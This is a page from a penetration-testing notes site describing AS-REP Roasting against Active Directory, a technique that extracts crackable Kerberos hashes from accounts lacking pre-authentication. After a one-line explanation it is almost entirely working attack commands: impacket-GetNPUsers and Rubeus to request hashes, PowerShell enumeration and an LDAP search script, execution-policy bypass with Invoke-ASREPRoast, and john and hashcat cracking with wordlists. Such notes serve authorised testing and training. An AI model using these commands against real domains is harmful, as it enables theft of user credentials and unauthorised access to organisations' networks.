0Sec
Elite
Elite0Sec
Elite
Elite0Sec
  • 🥷Whoami
  • 🔐Web-AppSec
    • 😀Reconnaissance
      • Scope
    • Features Abuse
      • 2FA
      • CAPTCHA
      • Commenting
      • Contact us
      • File-Upload
    • Technologies
      • WordPress
    • Information Disclosure
    • CSRF
    • CRLF Injection
    • Forgot Password
    • Account Takeover
    • LFI & RFI
    • OAuth Misconfiguration
    • Open Redirect
    • SQL injection
    • SSRF
    • Web Cache Deception
    • Web Cache Poisoning
    • Web AppSec Nots
    • Broken Link Injection
    • Checklist
    • Methodology v1.0
    • Checklist 1.1
  • 🥷Network-pentest
    • Recon
    • Windows Privilege Escalation
    • Active Directory
      • AD Enumeration
        • Users, Computer, Groups
        • BloodHound Enumeration
        • Credentials
        • Credential Dumping
        • PRIVILEGE ESCALATION
      • AD Techniques
        • MSSQL Injection
        • MSSQL AD Abuse
        • Linked Server Exploitation
        • Domain privEsc
          • Kerberos brute-force
          • AS-REP Roasting
          • Kerberoasting
          • Kerberos Unconstrained Delegation
          • Kerberos Constrained Delegation
          • PTH, PTT, Overpth, ptk
          • Silver ticket
          • Golden ticket
          • LLMNR Attack
      • AD Cheat Sheet
    • Red Team Note
    • Notes
Powered by GitBook
On this page
  1. Network-pentest
  2. Active Directory
  3. AD Techniques
  4. Domain privEsc

AS-REP Roasting

PreviousKerberos brute-forceNextKerberoasting

Last updated 4 months ago

ASREPRoast

If a user's UserAccountControl settings have "Do not require Kerberos pre-authentication" enabled, i.e., Kerberos auth disabled, it is possible to grab the user's crackable AS-REP and brute-force it offline.

Linux

#WithOut User
impacket-GetNPUsers  jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Using User
impacket-GetNPUsers jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast

Crack using hashcat Or john

Windows

.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast

Enumeration

Get-NetUser -PreauthNotRequired 
Get-DomainUser -PreauthNotRequired -Verbose
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True}

Powershell script to know users have weak config (Don't req preAuth)

preAuthRoasting.ps1
$strFilter = “(&(objectCategory=User)(userAccountControl:1.2.840.113556.1.4.803:=4194304))”
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$objSearcher = New-Object System.DirectoryServices.DirectorySearcher
$objSearcher.SearchRoot = $objDomain
$objSearcher.Filter = $strFilter
$objSearcher.SearchScope = “Subtree”
$colProplist = “name”
foreach ($I in $colPropList){$objSearcher.PropertiesToLoad.Add($i)}
$colResults = $objSearcher.FindAll()
$colResults | Format-Table
#Use ASREPRoast
powershell.exe -ep bypass
import-moudle .\preAuthRoasting.ps1
Invoke-ASREPRoast -Verbose
Invoke-ASREPRoast -Domain wargrey.mon -Server 192.168.1.50 | select -expand Hash

Impacket

impacket-GetNPUsers hacktor.local/ -usersfile <userfile> -dc-ip 192.168.1.50
john --wordlist=words.txt hash.txt

impacket-GetNPUsers services.local/ -usersfile users.txt -request -format hashcat -outputfile asreproast.txt -dc-ip 10.10.175.105 
#crack Using John
#windows env
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\asrephashes.txt
#Linux env
john --wordlist=/usr/shere/wordlists/rockyou hash.txt 
#OR https://hashcat.net/wiki/doku.php?id=<Algo-Number>
hashcat -m <Algo-Number> hash.txt /usr/share/wordlists/rockyou.txt --show

Resources

🥷
  • ASREPRoast
  • Linux
  • Windows
  • Enumeration
  • Impacket
LogoGitHub - jwardsmith/Active-Directory-ExploitationGitHub
Logo@_xpn_ - Kerberos AD Attacks - More Roasting with AS-REPXPN InfoSec Blog
LogoRoasting AS-REPsharmj0y
auth rep